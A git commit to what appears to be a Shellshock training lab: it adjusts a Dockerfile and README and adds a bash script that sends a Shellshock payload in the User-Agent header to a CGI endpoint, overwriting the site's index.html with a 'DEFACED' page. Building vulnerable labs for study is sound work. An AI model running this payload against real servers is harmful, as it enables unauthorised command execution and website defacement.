exploit deface added

opsxcq · opsxcq · commit b72c6abdc717 · 2016-12-08T13:03:57.000-02:00
diff --git a/Dockerfile b/Dockerfile
@@ -9,9 +9,15 @@ RUN apt-get update && \
     apt-get clean && \
     rm -rf /var/lib/apt/lists/*
 
+COPY packages /packages
+
+RUN dpkg -i /packages/*
+
 COPY vulnerable /usr/lib/cgi-bin/
 COPY index.html /var/www
 
+RUN chown www-data:www-data /var/www/index.html
+
 EXPOSE 80
 
 COPY main.sh /
diff --git a/README.md b/README.md
@@ -6,6 +6,8 @@ Shellshock, also known as Bashdoor, is a family of security bugs in the widely u
 
 ## Exploit
 
+There are several exploits
+
 ## Fix
 
 ### Disclaimer
diff --git a/exploit-deface.sh b/exploit-deface.sh
@@ -0,0 +1,24 @@
+#!/bin/bash
+
+if [ -z "$1" ]
+then
+    echo 'Please inform the IP and PORT of the target'
+    echo 'Example: ./exploit-deface.sh <ip> <port>'
+    return -1
+fi
+
+if [ -z "$1" ]
+then
+    echo 'Please inform the IP and PORT of the target'
+    echo 'Example: ./exploit-deface.sh <ip> <port>'
+    return -1
+fi
+
+ip=$1
+port=$2
+
+echo '[+] Sending the exploit'
+curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'echo \"<html><body><h1>DEFACED</h1></body></html>\" > /var/www/index.html'" http://$ip:$port/cgi-bin/vulnerable && \
+echo '[+] Target exploited, testing if defacement page is deployed' && \
+curl http://$ip:$port
+echo '[+] Done'
